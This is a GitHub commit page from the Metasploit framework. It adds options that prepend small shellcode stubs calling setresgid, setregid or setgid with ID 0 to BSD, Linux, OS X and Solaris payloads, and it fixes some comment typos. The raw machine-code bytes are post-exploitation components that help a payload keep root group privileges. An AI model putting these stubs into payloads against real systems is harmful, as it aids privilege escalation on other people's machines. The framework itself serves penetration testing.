Skip to content

Commit

Permalink
add PrependSet[re]gid support for unix payloads
Browse files Browse the repository at this point in the history
  • Loading branch information
m m committed Oct 10, 2012
1 parent 9a0a063 commit 90b948f
Show file tree
Hide file tree
Showing 4 changed files with 232 additions and 2 deletions.
50 changes: 50 additions & 0 deletions lib/msf/core/payload/bsd.rb
View file
Expand Up @@ -40,6 +40,27 @@ def initialize(info = {})
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
Expand Down Expand Up @@ -99,6 +120,35 @@ def generate(*args)
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
# Append

if (datastore['AppendExit'])
Expand Down
104 changes: 102 additions & 2 deletions lib/msf/core/payload/linux.rb
View file
Expand Up @@ -40,6 +40,27 @@ def initialize(info = {})
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('PrependChrootBreak',
[
false,
Expand Down Expand Up @@ -102,6 +123,31 @@ def generate(*args)
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xaa" +# movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x47" +# pushl $0x47 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x2e" +# pushl $0x2e #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
Expand Down Expand Up @@ -185,6 +231,33 @@ def generate(*args)
"\x44\xff\xff\x02" # sc #
end

if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
end

if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
end

if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
end

if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
Expand Down Expand Up @@ -235,6 +308,33 @@ def generate(*args)
pre << "\x0f\x05" # syscall #
end

if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x6a\x77" # push 0x77 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end

if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x48\x89\xf2" # mov rdx,rsi #
pre << "\x6a\x72" # push 0x72 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end

if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x6a\x6a" # push 0x6a #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end

if (datastore['PrependChrootBreak'])

# setreuid(0, 0)
Expand Down Expand Up @@ -269,7 +369,7 @@ def generate(*args)
pre << "\x48\x89\xe7" # mov rdi,rsp #

# loop chdir(..) 69 times
# syscall tendo to modify rcx can't use loop...
# syscall tend to modify rcx can't use loop...
pre << "\x6a\x45" # push 0x45 #
pre << "\x5b" # pop rbx #
pre << "\x6a\x50" # push 0x50 #
Expand All @@ -278,7 +378,7 @@ def generate(*args)
pre << "\xfe\xcb" # dec bl #
pre << "\x75\xf7" # jnz -7 #

# chrot (.) (witch should by /)
# chroot (.) (which should be /)
pre << "\x6a\x2e" # push . (0x2e) #
pre << "\x48\x89\xe7" # mov rdi,rsp #
pre << "\x48\x89\xd0" # mov rax,rdx #
Expand Down
50 changes: 50 additions & 0 deletions lib/msf/core/payload/osx.rb
View file
Expand Up @@ -40,6 +40,27 @@ def initialize(info = {})
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
Expand Down Expand Up @@ -99,6 +120,35 @@ def generate(*args)
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
# Append

if (datastore['AppendExit'])
Expand Down
30 changes: 30 additions & 0 deletions lib/msf/core/payload/solaris.rb
View file
Expand Up @@ -33,6 +33,20 @@ def initialize(info = {})
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
Expand Down Expand Up @@ -86,6 +100,22 @@ def generate(*args)
"\xff\xd6" # call *%esi #
end

if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xcb" +# movb $0xcb,%al #
"\xff\xd6" # call *%esi #
end

if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x2e" +# movb $0x2e,%al #
"\xff\xd6" # call *%esi #
end
# Append

if (datastore['AppendExit'])
Expand Down

0 comments on commit 90b948f

Please sign in to comment.